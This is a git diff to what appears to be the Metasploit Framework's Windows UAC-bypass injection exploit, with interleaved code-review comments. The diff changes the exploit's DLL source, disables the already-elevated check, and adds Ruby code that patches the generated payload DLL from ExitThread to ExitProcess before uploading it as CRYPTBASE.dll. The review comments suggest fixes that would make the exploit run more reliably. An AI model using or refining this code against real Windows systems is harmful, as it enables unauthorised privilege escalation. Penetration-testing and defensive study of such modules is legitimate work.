diff --git a/data/post/bypassuac-x64.dll b/data/post/bypassuac-x64.dll
index f5135759d5..3bfc37552b 100644
Binary files a/data/post/bypassuac-x64.dll and b/data/post/bypassuac-x64.dll differ
diff --git a/data/post/bypassuac-x86.dll b/data/post/bypassuac-x86.dll
index d9a88d462f..8ea8f0ad21 100644
Binary files a/data/post/bypassuac-x86.dll and b/data/post/bypassuac-x86.dll differ
diff --git a/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp b/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
index fd4e34abae..16e57f0c3f 100644
--- a/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
+++ b/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
@@ -85,8 +85,6 @@ void exploit()
 Wow64DisableWow64FsRedirection(&OldValue);
 if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL) {
- WaitForSingleObject(shinfo.hProcess, 200);
- TerminateProcess(shinfo.hProcess, 0); // Even better if the template payload.dll calls ExitProcess
 CloseHandle(shinfo.hProcess);
 }
 Wow64RevertWow64FsRedirection(OldValue);
diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb
index 4ebf4927ac..1e5c21924e 100644
--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
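Review bot: The new header comment in bypassuac_injection.rb writes the download URL as `http//metasploit.com/download`, without the colon after the scheme, so it is not a valid link. It should read `# This module requires Metasploit: http://metasploit.com/download`. The second added line already uses a well-formed `https://` URL.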
@@ -64,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Local
 def exploit
- fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
+ #fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
 #
 # Verify use against Vista+
@@ -154,6 +152,11 @@ class Metasploit3 < Msf::Exploit::Local
 # Generate payload and random names for upload
 #
 payload = generate_payload_dll
+ # Change ExitThread to ExitProcess ...
+ exit_thread = "\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00"
+ exit_process = "\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73"
+ index = payload.index(exit_thread)
+ payload[index,exit_process.length] = exit_process
 payload_filepath = "#{tmpdir}\\CRYPTBASE.dll"
 print_status("Uploading the Payload DLL to the filesystem...")
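Review bot: The already-elevated guard at the top of `exploit` is disabled by commenting it out, and nothing in the hunk records why. With it gone, a session that is already admin or SYSTEM appears to run the remaining steps anyway, including the DLL upload shown later in this diff; the rest of `exploit` lies outside this hunk, so a later check may exist. Either restore `fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?`, or delete the line and add a comment saying why the check was wrong, rather than leaving dead code behind.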
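Review bot: `payload.index(exit_thread)` returns nil when the generated DLL does not contain the bytes `ExitThread\0`, and the next line then raises a TypeError from `payload[nil, ...]` instead of a clean module failure. Guard it with `fail_with(Exploit::Failure::Unknown, 'ExitThread not found in payload DLL') if index.nil?` before the assignment. The 11-byte replacement has no terminator and overwrites the NUL of the original string, so the patched name is only terminated if the following byte happens to be zero; that assumption about the template deserves a comment. Because the Exploit.cpp hunk drops the `TerminateProcess` call, the launched process now ends only if this patch takes effect; the rest of `exploit` lies outside this hunk. Writing the literals as `"ExitThread\x00"` and `"ExitProcess"` would also read better than the hex escapes.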